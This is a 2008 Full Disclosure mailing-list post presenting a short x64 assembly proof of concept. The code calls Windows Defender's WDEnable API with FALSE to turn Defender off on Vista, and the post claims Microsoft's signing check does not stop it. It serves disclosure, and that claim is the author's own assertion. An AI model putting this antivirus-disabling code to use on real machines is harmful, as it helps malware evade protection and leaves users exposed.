Full Disclosure mailing list archives
[Wired Security/EOF] Disable Windows Defender (Vista) PoC code
From: <skyout.fd () wired-security net>
Date: Wed, 14 May 2008 18:05:17 +0200
Hey guys, my friend Izee from the EOF-Project(.net) team has coded a simple PoC code, that demonstrates how to disable the Windows Defender on Vista (tested with and without SPs on x86/x64) using its own API made for it. The API has the following structure: --- SNIP --- HRESULT WDEnable( BOOL fEnable ); --- Something about the parameter(s): --- SNIP --- Parameters fEnable [in] Windows Defender status that the calling application wants to set. TRUE enables Windows Defender. FALSE disables Windows Defender. --- Now the interesting thing, what Microsoft says about the security of this API: --- SNIP --- Remarks The application calling this function must run with administrator permissions on the local computer. In Windows Vista, the user is prompted for administrator permission when the application is running with lower privileges. Windows Defender also validates proper signing of the calling process (and all the loaded modules) before allowing the calling application to change the status. If the calling process image (or any loaded modules) is not signed or is flagged as a threat by the Windows Defender signature, then the call fails with the appropriate error code. --- And here the code from Izee/EOF, that shows, that this is a lie and nothing more. The users get fooled... --- SNIP --- extrn LoadLibraryA :proc extrn GetProcAddress :proc extrn ExitProcess :proc .data l db '\Program Files\Windows Defender\MpClient',0 p db 'WDEnable',0 .code eof proc push rsp lea rcx, l call LoadLibraryA lea rdx, p mov rcx, rax call GetProcAddress xor rcx, rcx ;Turn Windows Defender off call rax call ExitProcess eof endp end --- News: http://wired-security.net/archive/2008/may/index.php#07_2_052008 Sincerely, SkyOut/Wired Security in corporation with Izee/EOF _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- [Wired Security/EOF] Disable Windows Defender (Vista) PoC code skyout.fd (May 14)
- Re: [Wired Security/EOF] Disable Windows Defender (Vista) PoC code Peter Ferrie (May 14)
- Re: [Wired Security/EOF] Disable Windows Defender (Vista) PoC code Fredrick Diggle (May 14)
- Re: [Wired Security/EOF] Disable Windows Defender(Vista) PoC code skyout.fd (May 15)
- Re: [Wired Security/EOF] Disable Windows Defender(Vista) PoC code Fredrick Diggle (May 16)
- Re: [Wired Security/EOF] Disable Windows Defender (Vista) PoC code Peter Ferrie (May 14)